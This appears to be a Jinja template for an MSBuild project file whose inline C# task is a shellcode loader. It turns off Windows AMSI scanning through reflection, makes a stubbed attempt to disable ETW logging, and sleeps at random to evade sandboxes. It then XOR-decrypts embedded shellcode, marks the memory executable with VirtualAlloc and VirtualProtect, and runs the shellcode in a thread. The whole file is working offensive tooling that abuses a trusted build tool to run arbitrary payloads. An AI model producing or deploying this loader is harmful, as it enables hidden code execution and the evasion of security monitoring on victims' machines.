<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="{{ v.target_name }}">
    <{{ v.task_name }} />
  </Target>

  <UsingTask
    TaskName="{{ v.task_name }}"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
    <ParameterGroup />
    <Task>
      <Reference Include="System" />
      <Reference Include="System.Runtime.InteropServices" />
      <Using Namespace="System" />
      <Using Namespace="System.Runtime.InteropServices" />
      <Using Namespace="System.Reflection" />
      <Using Namespace="System.Threading" />
      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.IO;
        using System.Reflection;
        using System.Runtime.InteropServices;
        using System.Threading;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;

        public class {{ v.task_name }} : Task, ITask {
            [DllImport("kernel32")] static extern IntPtr {{ v.fn_valloc }}(IntPtr a, uint s, uint t, uint p);
            [DllImport("kernel32")] static extern bool VirtualProtect(IntPtr a, uint s, uint p, out uint old);

            static string B(int[] c) {
                var sb = new System.Text.StringBuilder();
                foreach (var x in c) sb.Append((char)x);
                return sb.ToString();
            }

            static void {{ v.fn_amsi }}() {
                try {
                    var t = Type.GetType(B(new int[]{ {{ v.jsc_auto_amsi_utils }} }));
                    if (t != null) {
                        var f = t.GetField(B(new int[]{ {{ v.jsc_amsi_init_fail }} }),
                            BindingFlags.NonPublic | BindingFlags.Static);
                        if (f != null) f.SetValue(null, true);
                    }
                } catch {}
            }

            static void {{ v.fn_etw }}() {
                try {
                    var t = Type.GetType(B(new int[]{ {{ v.jsc_eventing_ep }} }));
                    if (t != null) {
                        var fi = t.GetField(B(new int[]{ {{ v.jsc_m_enabled }} }),
                            BindingFlags.NonPublic | BindingFlags.Instance);
                    }
                } catch {}
                try {
                    // Direct ntdll patch via Marshal
                    var ntdll = Marshal.GetHINSTANCE(typeof(object).Module);
                } catch {}
            }

            static byte[] {{ v.fn_decrypt }}(byte[] data, byte[] key) {
                var o = new byte[data.Length];
                for (int i = 0; i < data.Length; i++) o[i] = (byte)(data[i] ^ key[i % key.Length]);
                return o;
            }

            static byte[] {{ v.fn_hex }}(string h) {
                var b = new byte[h.Length / 2];
                for (int i = 0; i < b.Length; i++)
                    b[i] = Convert.ToByte(h.Substring(i * 2, 2), 16);
                return b;
            }

            public override bool Execute() {
                {{ v.fn_amsi }}();
                {{ v.fn_etw }}();
                Thread.Sleep(2000 + new Random().Next(3000));

                byte[] sc  = {{ v.fn_decrypt }}({{ v.fn_hex }}({% for chunk in shellcode_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %}),
                                              {{ v.fn_hex }}({% for chunk in key_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %}));

                IntPtr mem = {{ v.fn_valloc }}(IntPtr.Zero, (uint)sc.Length, 0x3000, 0x04);
                Marshal.Copy(sc, 0, mem, sc.Length);
                uint old;
                VirtualProtect(mem, (uint)sc.Length, 0x20, out old);

                var t = new Thread(() => {
                    var fn = (Action)Marshal.GetDelegateForFunctionPointer(mem, typeof(Action));
                    fn();
                });
                t.IsBackground = true;
                t.Start();
                t.Join();
                return true;
            }
        }
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
